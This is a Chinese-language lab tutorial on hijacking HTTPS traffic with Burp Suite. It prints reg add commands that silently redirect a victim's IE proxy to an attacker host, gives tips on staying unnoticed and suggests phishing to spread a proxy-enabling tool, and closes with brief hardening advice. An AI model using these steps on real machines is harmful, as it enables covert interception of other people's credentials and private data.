敏感數據的安全傳輸是網絡安全技術的一個重要的組成部分,多數認爲只有https是最好的實踐,姑且不考慮ssl證書的價格,至少https也不是絕對安全的,當遭受中間人劫持***的時候也會獲取到傳輸中的明文數據,具體***原理見《HTTPS連接過程以及中間人***劫持》,但是這篇文章也說了,使用中間人***手段必須讓客戶端信任中間人的證書,否則***無效。因此這種***方式難度大且不方便***,但是並不是說不能實現。個人認爲至少有以下兩種方式可以進行利用:
一、獲取服務器的遠程桌面登錄權限後,設置客戶端信任中間人的證書!
二、使用物理***,獲取到被***者的電腦後,設置客戶端信任中間人的證書
1.1.1 設置客戶端信任中間人證書
這裏的中間人我們藉助burpsuite,然後實現本次的一個https劫持***。首先我們需要客戶端(被***者的電腦)信任burpsuite的證書,即進行安裝burpsuite的CA證書,具體配置見官方配置。
1.1.2 ***條件
通過思考我們發現,目前的利用也是存在有一定的限制的,姑且理解爲技術不夠。***條件主要有以下幾方面:
一、服務器需要是windows主機。
二、***者需要有獨立外網主機(或者同一局域網中)。
三、擁有服務器的遠程桌面控制權,或者臨時擁有被***者的電腦。
對於第三個條件簡單說明下,擁有服務器的遠程桌面控制權,不一定能獲取到應用系統中存在的敏感數據或者數據庫中的數據,例如,你在一個網站(只有一個登陸頁面)處檢測出了命令執行漏洞,可以執行命令,但是權限不是很高(即使權限很高,除非你只感興趣服務器的控制權而不是應用系統中的敏感數據),此時我們就可以使用這種***方式了!
1.1.3 實驗環境介紹
操作系統:Microsoft Windows Server 2008 R2 Enterprise,IP:192.168.1.25
用戶權限組:*Users
使用工具:burpsuite
***者IP:192.168.1.200
1.1.4 配置***者burpsuite
由於我們是要獲取被***者傳過來的數據包,而被***者往往都是處於內網,外網訪問多數是通過映射出來的,所以我們設置我們的burpsuite的代理爲任意ip過來的數據包,如下圖所示:
1.1.5 設置被***者IE代理
如果能進入到桌面環境,可以通過圖形化界面進行設置IE代理,如下圖所示:
如果不能進入到遠程桌面,我們可以使用下面命令進行設置IE代理:
//開啓代理!
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
//設置代理ip及端口,爲***者的ip,端口與burpsuite設置保持一致!
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "192.168.1.200:8080" /f
//關閉設置的代理可以使用下面的命令:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f 以上命令經測試只要是users用戶組即可成功執行,如下圖所示,爲了方便我們可以將開啓和關閉的命令分別寫爲bat批處理文件。
1.1.6 獲取劫持後的明文數據
爲了不讓被***者懷疑,我們不要開啓截斷功能,如下圖所示:
現在***者只需要等待被***者使用瀏覽器訪問相關網站,即使是https的站點我們同樣能劫持到明文數據,如下圖所示:
1.1.7 總結及修復建議
另外如果只是http的網站的話,上面的***難度及危害會大大增加,因爲不需要設置客戶端去信任中間人的證書這一環節,只需要設置客戶端的代理即可,而這一個可以使用釣魚的方式將開啓代理功能的工具進行傳播就可以,或者只需要一個簡單命令執行shell,普通權限就可以!修復建議參考如下:
一、對服務器進行安全加固,防止利用服務器漏洞進行***!
二、設置瀏覽器不要使用默認的系統代理,即IE全局代理!
三、加強安全意識,離開電腦的時候記得設置密碼鎖屏,借電腦給別人用的時候儘量在旁邊,使用完成後檢查是否有異常!